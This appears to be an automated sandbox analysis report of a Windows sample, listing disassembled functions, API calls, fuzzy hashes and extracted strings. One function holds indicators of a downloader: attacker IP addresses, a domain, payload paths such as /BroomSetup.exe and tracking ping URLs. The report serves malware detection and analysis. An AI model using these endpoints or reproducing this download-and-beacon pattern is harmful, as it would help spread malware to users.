Instruction ID: 1154e27c015a897812a0a5709c6716ad0e12ceb5b9437c51957f638709d22443
Opcode Fuzzy Hash: 77aa99f2f88df8cd4d36c2d0dc9640374021eb40fe0889f8d183050a52ea336c
Instruction Fuzzy Hash: 68114C71904209AFCF05DF58E9419DB7BF4EF48314F10409AF808AB311D631D9618BAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040E1B2 Relevance: 1.5, APIs: 1, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 701e18208b567a6bb177b1ccb661cbfd4effab1e33f914200ccb643209a10c45
Instruction ID: bb13e13d757cd37dfe0a4f239b5d8845d05e4a8eb61872b1cde1787caac163ea
Opcode Fuzzy Hash: 701e18208b567a6bb177b1ccb661cbfd4effab1e33f914200ccb643209a10c45
Instruction Fuzzy Hash: E4F0F93254061496D6213A6B9C0579B32AC9F92339F114BBFFC30A61C2CA7CE95246AE

Uniqueness

Uniqueness Score: -1.00%

Function 00402F6B Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402F70

Part of subcall function 004035F5: __EH_prolog.LIBCMT ref: 004035FA
Part of subcall function 004035F5: std::_Lockit::_Lockit.LIBCPMT ref: 00403609
Part of subcall function 004035F5: int.LIBCPMT ref: 00403620
Part of subcall function 004035F5: std::locale::_Getfacet.LIBCPMT ref: 00403629
Part of subcall function 004035F5: std::_Lockit::~_Lockit.LIBCPMT ref: 00403670

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: H_prologLockitstd::_$GetfacetLockit::_Lockit::~_std::locale::_
String ID:
API String ID: 3585332825-0
Opcode ID: 6af91489f422ab2b9346da6299f13020bb6ba693aa2f45747282a65afbb3964b
Instruction ID: 08e3709e77e7d1eb8e6a734fcd7c8cb2ed90b0a3f4c6ef6dd5fb35cf0d7a5197
Opcode Fuzzy Hash: 6af91489f422ab2b9346da6299f13020bb6ba693aa2f45747282a65afbb3964b
Instruction Fuzzy Hash: 80018F70A10114AFDB14EB25DA4ABAE77F9AF04708F00403EF405B76D1DBF8AE008B58

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1D1 Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0041A212

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 68fd172b046a401a07b87b6cc8e6e0eb4e84c281b2bbab5ff70b0aff8b290acd
Instruction ID: 12cd10f48dc7b96564373969defca7bad1702ec24c59837b56aad39c86ff4cfc
Opcode Fuzzy Hash: 68fd172b046a401a07b87b6cc8e6e0eb4e84c281b2bbab5ff70b0aff8b290acd
Instruction Fuzzy Hash: AFF09A32511119BBCF005E96DC02CDA3B6EEF89334F100156F91492150DA3ADD60A7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00417A45 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b75641747b422377c90d67b6dee4493775f18ffac96cc9d64fbbcf0dcb9ea88a
Instruction ID: 1d8c2cfb616aaf75abf93827710d27348e1db2613881ba842acdabaabffa5ab7
Opcode Fuzzy Hash: b75641747b422377c90d67b6dee4493775f18ffac96cc9d64fbbcf0dcb9ea88a
Instruction Fuzzy Hash: 4BE0A03168822557A72026629C04BDF6669AF417E0F150223AC04962A0CB6C8FD181ED

Uniqueness

Uniqueness Score: -1.00%

Function 00409256 Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00409967

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: Exception@8Throw
String ID:
API String ID: 2005118841-0
Opcode ID: 25d8b0dcc0aeb082a63c197dce86bf9214427bbe7c1bc7486ec08e7daa717c4d
Instruction ID: 8f33375d03ef340e879cf663a0733e21cf849d267f07301eb1b68e0c667a0042
Opcode Fuzzy Hash: 25d8b0dcc0aeb082a63c197dce86bf9214427bbe7c1bc7486ec08e7daa717c4d
Instruction Fuzzy Hash: 1FE0923440430DB6CF007A66E8169AE772C1E04324B20497FB928B56E2EF78DD96C18E

Uniqueness

Uniqueness Score: -1.00%

Function 00419F10 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00419F2D

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ec085ca9659a0f56eb08fe4c6845a4ad54c8fcd842bd73b4fead1427a61b2733
Instruction ID: 9d2ef54cfd7c3626aa2ff180f2ecc7fa707dd95b0fec4855ab8d986de787a24b
Opcode Fuzzy Hash: ec085ca9659a0f56eb08fe4c6845a4ad54c8fcd842bd73b4fead1427a61b2733
Instruction Fuzzy Hash: E9D06C3210010DBBDF128F85DC06EDA3BAAFB4C714F014010FA1856020C732E832EB94

Uniqueness

Uniqueness Score: -1.00%

Function 04096075 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 040960C6

Memory Dump Source

Source File: 00000006.00000002.2693695310.0000000004095000.00000040.00000020.00020000.00000000.sdmp, Offset: 04095000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4095000_i1.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 30aaa2052edc2c4c7d5661d2d424e88a89bea821fbd26297d6db8a8d3543783d
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 5B113F79A00208EFDB01DF98C985E99BBF5AF08350F058094F948AB361D771EA50EF80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 05CB4C75 Relevance: 48.5, APIs: 2, Strings: 25, Instructions: 1237COMMON

Download Yara Rule

APIs

Part of subcall function 05CB6823: __EH_prolog.LIBCMT ref: 05CB6828

GetModuleFileNameA.KERNEL32(00000000,?,00000104,0043BEDC), ref: 05CB4D3B

Part of subcall function 05CB62B1: __EH_prolog.LIBCMT ref: 05CB62B6
Part of subcall function 05CB62B1: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 05CB6398

Strings

P, xrefs: 05CB5312
185.172.128.228, xrefs: 05CB5F88, 05CB6034, 05CB6139
P, xrefs: 05CB614A
185.172.128.228, xrefs: 05CB5527, 05CB55CD, 05CB574C
SOFTWARE\BroomCleaner, xrefs: 05CB5358, 05CB544C
.exe, xrefs: 05CB618D, 05CB61AF
.zip, xrefs: 05CB5DC4, 05CB5DE6
/1/Package.zip, xrefs: 05CB5C7B, 05CB5D15, 05CB5D6F
/syncUpd.exe, xrefs: 05CB5923, 05CB59A5, 05CB5AD6
\run.exe, xrefs: 05CB5E37, 05CB5E8F
/timeSync.exe, xrefs: 05CB59C6, 05CB5A59, 05CB5AC7
P, xrefs: 05CB5ABC
/ping.php?substr=%s, xrefs: 05CB55EE, 05CB56C4, 05CB56DC
P, xrefs: 05CB5D77
.exe, xrefs: 05CB5B18, 05CB5B3A
P, xrefs: 05CB575C
/cpa/ping.php?substr=%s&s=ab&sub=%s, xrefs: 05CB501D, 05CB51B3, 05CB51CC
@, xrefs: 05CB4CE3
note.padd.cn.com, xrefs: 05CB5BA9, 05CB5C61, 05CB5D66
185.172.128.90, xrefs: 05CB521A, 05CB52B4, 05CB5302
/BroomSetup.exe, xrefs: 05CB604E, 05CB60F4, 05CB6142
iC, xrefs: 05CB5E24
185.172.128.59, xrefs: 05CB57A3, 05CB583D, 05CB5AB4
Installed, xrefs: 05CB5466, 05CB54C4
185.172.128.203, xrefs: 05CB585E, 05CB5904, 05CB5AA6

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: H_prolog$FileIos_base_dtorModuleNamestd::ios_base::_
String ID: @$ iC$.exe$.exe$.zip$/1/Package.zip$/BroomSetup.exe$/cpa/ping.php?substr=%s&s=ab&sub=%s$/ping.php?substr=%s$/syncUpd.exe$/timeSync.exe$185.172.128.203$185.172.128.228$185.172.128.228$185.172.128.59$185.172.128.90$Installed$P$P$P$P$P$SOFTWARE\BroomCleaner$\run.exe$note.padd.cn.com
API String ID: 2531350358-3920416335
Opcode ID: 250d8a035f8b337f53b0f2b82bef072aba3463d320e73a283fe624a254bad318
Instruction ID: 523d03de10562aa55ffa0335d9331c56afea10c0fac72bacf683b5d64a4df7b4
Opcode Fuzzy Hash: 250d8a035f8b337f53b0f2b82bef072aba3463d320e73a283fe624a254bad318
Instruction Fuzzy Hash: 8AA2541061B2D0AECF19B77C5D5E7CE2BE0AB63640F547CA9C2A01B362CB54851CE7DA

Uniqueness

Uniqueness Score: -1.00%

Function 0042086B Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 00420977
IsValidCodePage.KERNEL32(00000000), ref: 004209D2
IsValidLocale.KERNEL32(?,00000001), ref: 004209E1
GetLocaleInfoW.KERNEL32(?,00001001,=CA,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00420A29
GetLocaleInfoW.KERNEL32(?,00001002,00000004,00000040), ref: 00420A48

Strings

=CA, xrefs: 00420881, 00420A20
,CUSA, xrefs: 004208D0
=CA, xrefs: 00420894, 004208A4, 00420964, 00420906, 004208FB, 004208FE, 00420909, 00420967
=CA, xrefs: 004209A0, 0042094D, 00420942

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID: ,CUSA$=CA$=CA$=CA
API String ID: 745075371-916183771
Opcode ID: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
Instruction ID: 7ddd42caa13bcc6a581a5d9380eb1867f4bda1d866acf156490288d52a5f9f8d
Opcode Fuzzy Hash: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
Instruction Fuzzy Hash: 2351A4B1B002299BEB20DFA5EC45BBF77F8AF04700F54056BE505E7252D7789980CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041FF33 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00414344,?,?,?,?,00413D9B,?,00000004), ref: 00420015
_wcschr.LIBVCRUNTIME ref: 004200A5
_wcschr.LIBVCRUNTIME ref: 004200B3
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,DCA,00000000,?), ref: 00420156

Strings

DCA, xrefs: 0042002C, 00420074, 0042011C
,CUSA, xrefs: 0041FF71

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID: ,CUSA$DCA
API String ID: 4212172061-972430610
Opcode ID: fab0966e0587d915fa6208f5e4fc1387ce1aec17fb088b71372f47add09b0d42
Instruction ID: fa09c2a12b3627a5d585845c4e70effd6588540dd04b31b38b5545ebe516d264
Opcode Fuzzy Hash: fab0966e0587d915fa6208f5e4fc1387ce1aec17fb088b71372f47add09b0d42
Instruction Fuzzy Hash: 2C610871700216AAE724AB35EC42BEB77E8EF04314F14403FF505D7282EA79E986C769

Uniqueness

Uniqueness Score: -1.00%

Function 00420697 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004209B6,?,00000000), ref: 00420730
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004209B6,?,00000000), ref: 00420759
GetACP.KERNEL32(?,?,004209B6,?,00000000), ref: 0042076E

Strings

OCP, xrefs: 004206EB
ACP, xrefs: 004206B5

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
Instruction ID: ccfaff94e51ab864e712d9520aeba98098d7830e350b78e24d8ea24043a496f3
Opcode Fuzzy Hash: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
Instruction Fuzzy Hash: 8821F422B00125ABD7308F14E900A9BB3E6ABD4B50BD68176E90AD7312E736ED41CB48

Uniqueness

Uniqueness Score: -1.00%

Function 05CB08FE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,05CB0C1D,?,00000000), ref: 05CB0997
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,05CB0C1D,?,00000000), ref: 05CB09C0
GetACP.KERNEL32(?,?,05CB0C1D,?,00000000), ref: 05CB09D5

Strings

OCP, xrefs: 05CB0952
ACP, xrefs: 05CB091C

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
Instruction ID: db44bb6f7d08ef8450278e8b730958000c54cd54c968c7e8e4e720c056256592
Opcode Fuzzy Hash: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
Instruction Fuzzy Hash: 5821B022F05105AAF7349F55C909BE7B3A7BB84A61F468D64E94AF7100E7B2DB40C3D0

Uniqueness

Uniqueness Score: -1.00%

Function 05CB0AD2 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 05CA6F80: GetLastError.KERNEL32(?,?,05C9E697,?,?,?,05C9ED94,?), ref: 05CA6F84
Part of subcall function 05CA6F80: _free.LIBCMT ref: 05CA6FB7
Part of subcall function 05CA6F80: SetLastError.KERNEL32(00000000), ref: 05CA6FF8
Part of subcall function 05CA6F80: _abort.LIBCMT ref: 05CA6FFE

Part of subcall function 05CA6F80: _free.LIBCMT ref: 05CA6FDF
Part of subcall function 05CA6F80: SetLastError.KERNEL32(00000000), ref: 05CA6FEC

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 05CB0BDE
IsValidCodePage.KERNEL32(00000000), ref: 05CB0C39
IsValidLocale.KERNEL32(?,00000001), ref: 05CB0C48
GetLocaleInfoW.KERNEL32(?,00001001,05CA45A4,00000040,?,05CA46C4,00000055,00000000,?,?,00000055,00000000), ref: 05CB0C90
GetLocaleInfoW.KERNEL32(?,00001002,05CA4624,00000040), ref: 05CB0CAF

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID:
API String ID: 745075371-0
Opcode ID: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
Instruction ID: f41322d35c1b6d7a9b007e5c1b7c58ae98406e340ac90f7eba740fa066caf675
Opcode Fuzzy Hash: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
Instruction Fuzzy Hash: C8514F71A0421AABEF20DFA5CC48AFB77B8FF04704F044969E915F7150EBF09A449B61

Uniqueness

Uniqueness Score: -1.00%

Function 004123A0 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMON

Download Yara Rule

Strings

y%B, xrefs: 004123BD, 00412568, 0041278C, 00412726, 004125B6, 00412544
y%B, xrefs: 00412808, 004125F2, 00412481

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID:
String ID: y%B$y%B
API String ID: 0-2510245575
Opcode ID: 639d753ca5804acfb26a7323c6b70442fdf5003eed0a35c333bc141f8f4a1fb1
Instruction ID: 7f81a5055d29d3c9b3a65b9dd9c97bea9b47a5c616e9cad61c519a63aba044dd
Opcode Fuzzy Hash: 639d753ca5804acfb26a7323c6b70442fdf5003eed0a35c333bc141f8f4a1fb1
Instruction Fuzzy Hash: F8024C71E002199FDF14CFA9D9806EEB7F1FF88314F25826AD819E7380D774AA518B94

Uniqueness

Uniqueness Score: -1.00%

Function 05CB019A Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 05CA6F80: GetLastError.KERNEL32(?,?,05C9E697,?,?,?,05C9ED94,?), ref: 05CA6F84
Part of subcall function 05CA6F80: _free.LIBCMT ref: 05CA6FB7
Part of subcall function 05CA6F80: SetLastError.KERNEL32(00000000), ref: 05CA6FF8
Part of subcall function 05CA6F80: _abort.LIBCMT ref: 05CA6FFE

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,05CA45AB,?,?,?,?,05CA4002,?,00000004), ref: 05CB027C
_wcschr.LIBVCRUNTIME ref: 05CB030C
_wcschr.LIBVCRUNTIME ref: 05CB031A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,05CA45AB,00000000,05CA46CB), ref: 05CB03BD

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID:
API String ID: 4212172061-0
Opcode ID: fab0966e0587d915fa6208f5e4fc1387ce1aec17fb088b71372f47add09b0d42
Instruction ID: 628be3a1dccad202417acede6128108c79a181fd3ae3d4b53113636280a622d0
Opcode Fuzzy Hash: fab0966e0587d915fa6208f5e4fc1387ce1aec17fb088b71372f47add09b0d42
Instruction Fuzzy Hash: 3261F972704606ABEB25EB74CC4DFFB77A8FF04304F144969E506E7180EAB4EA448791

Uniqueness

Uniqueness Score: -1.00%

Function 004201F6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

EnumSystemLocalesW.KERNEL32(0042031E,00000001,00000000,?,=CA,?,0042094B,00000000,?,?,?), ref: 00420268

Strings

=CA, xrefs: 004201FB
KB, xrefs: 0042023D

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID: =CA$KB
API String ID: 1084509184-2718487402
Opcode ID: 6ecc5bd197992c8aded88e3bc6e768e3d3d56082aa0088f612a67ffe9f881cb2
Instruction ID: 80b9233af1491a43965ff49f25878bf7386ded64d37c123707e1c04ccab01a49
Opcode Fuzzy Hash: 6ecc5bd197992c8aded88e3bc6e768e3d3d56082aa0088f612a67ffe9f881cb2
Instruction Fuzzy Hash: 2E11593A3003058FDB189F79E8955BABBD1FF80358B54442EE94647B01D775AC42CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0042031E Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00420372
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004203C3
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00420483

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: ErrorInfoLastLocale$_free$_abort
String ID:
API String ID: 2829624132-0
Opcode ID: 4a54e068e7e21b5c93d00dbf49a271e166efa7efff7abe37b2459b5ebe4b8a98
Instruction ID: 150eb58c917d6dfbd7f4c2a18d44eb002ac57a30d794a2eb47e087b0f294e0c3
Opcode Fuzzy Hash: 4a54e068e7e21b5c93d00dbf49a271e166efa7efff7abe37b2459b5ebe4b8a98
Instruction Fuzzy Hash: D46185717001279BDB28DF25DC81BB677E8EF14344F50807AE905C6642E77CE995CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041073B Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00410833
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041083D
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041084A

Memory Dump Source

Source File: 00000006.00000002.2690106543.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_i1.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
Instruction ID: d1fab33c372cae0273f805137467810c70e9cba24fd9c5a15224a60e011b092e
Opcode Fuzzy Hash: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
Instruction Fuzzy Hash: E031C47490121C9BCB21EF25D9887CDB7B8BF08310F5041EAE41CA7291E7749F858F88

Uniqueness

Uniqueness Score: -1.00%

Function 05CA09A2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 05CA0A9A
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 05CA0AA4
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 05CA0AB1

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
Instruction ID: fcc0aa2ac69e8d0ece5fa265cbc7286cd8e131433ad4fbbef8f34669577e0a21
Opcode Fuzzy Hash: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
Instruction Fuzzy Hash: 1C31B27590122DABCF25DF64D888B99BBB4BF08710F5045EAE80CA7290E7349F858F45

Uniqueness

Uniqueness Score: -1.00%

Function 05CA3C4E Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,05CA3C24,00000003,00438DB0,0000000C,05CA3D7B,00000003,00000002,00000000,?,05CA2DD2,00000003), ref: 05CA3C6F
TerminateProcess.KERNEL32(00000000,?,05CA3C24,00000003,00438DB0,0000000C,05CA3D7B,00000003,00000002,00000000,?,05CA2DD2,00000003), ref: 05CA3C76
ExitProcess.KERNEL32 ref: 05CA3C88

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
Instruction ID: 7d671b43a14a00ae35f7f87b18045b893a360bb55fe4e32ca609a1deb3ecbb76
Opcode Fuzzy Hash: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
Instruction Fuzzy Hash: 97E0BF3220054AABDF116F54DD1CA993F69FB44689F504924FD4646131CB35DE52DA44

Uniqueness

Uniqueness Score: -1.00%

Function 05C9092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

l, xrefs: 05C90966
., xrefs: 05C9095F
GetProcAddress., xrefs: 05C909DC, 05C909DF, 05C909E4

Memory Dump Source

Source File: 00000006.00000002.2694253971.0000000005C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5c90000_i1.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: f35d481a91a4bb0b15e4bebb4a7b457447bf6761312ab56263a06f727391afe9
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 563159B6900609DFDB14CF99C888AAEBBF9FF48324F15444AD841BB310D771EA45CBA4

Uniqueness

Uniqueness Score: -1.00%

